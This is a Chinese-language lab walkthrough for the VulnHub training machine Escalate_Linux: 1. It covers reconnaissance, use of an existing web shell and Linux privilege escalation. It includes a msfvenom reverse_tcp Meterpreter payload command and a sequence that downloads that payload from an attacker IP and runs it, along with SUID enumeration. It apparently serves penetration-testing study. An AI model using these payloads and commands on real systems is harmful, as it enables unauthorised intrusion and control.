VulnHub-Escalate_Linux: 1靶机学习
字数 785 2025-08-15 21:33:32
VulnHub-Escalate_Linux: 1靶机学习文档
一、靶机概述
Escalate_Linux: 1是一个专门设计用于练习Linux提权技术的VulnHub靶机。该靶机包含了12种不同的提权方式,适合初学者学习Linux系统安全测试和权限提升技术。
二、信息收集阶段
1. 网络扫描
使用以下命令发现靶机IP地址:
arp-scan -l
# 或
nmap -sn 192.168.1.0/24
2. 端口扫描
对发现的靶机IP进行详细端口扫描:
nmap -sV -p- <靶机IP>
3. Web服务枚举
- 访问80端口的Web服务
- 使用dirb进行目录爆破:
dirb http://<靶机IP> /usr/share/wordlists/dirb/common.txt -X .php
4. 发现Web Shell
- 通过目录爆破发现shell.php文件
- 访问http://<靶机IP>/shell.php
- 测试命令执行功能,确认可以执行系统命令
5. 建立反向Shell
使用Metasploit创建稳定shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=4444 -f elf > shell.elf
在shell.php中执行:
wget http://<攻击机IP>/shell.elf -O /tmp/shell.elf
chmod +x /tmp/shell.elf
/tmp/shell.elf
6. 信息收集脚本
- 下载LinEnum.sh信息收集脚本:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
三、提权阶段
1. 获取交互式Shell
python -c 'import pty;pty.spawn("/bin/bash")'
2. 查找SUID文件
find / -perm -u=s -type f 2>/dev/null
3. 利用SUID提权
- 进入user3用户目录
- 执行特定SUID程序获取root权限
四、其他可能的提权方式
该靶机共设计有12种提权方式,包括但不限于:
- SUID提权
- 内核漏洞提权
- 计划任务提权
- 环境变量提权
- sudo配置不当提权
- 密码复用提权
- 服务配置不当提权
- 共享库劫持提权
- 数据库提权
- 配置文件泄露提权
- SSH密钥提权
- 符号链接提权
五、学习建议
- 对每种提权方式进行单独测试和研究
- 记录每种提权方式的技术原理和利用条件
- 尝试不使用自动化脚本手动完成提权
- 研究防御措施,了解如何防止这些提权方式
六、总结
Escalate_Linux: 1靶机是一个优秀的Linux提权学习平台,通过实际操作可以深入理解Linux系统权限机制和安全配置的重要性。建议初学者按照步骤逐一尝试,并深入研究每种提权技术背后的原理。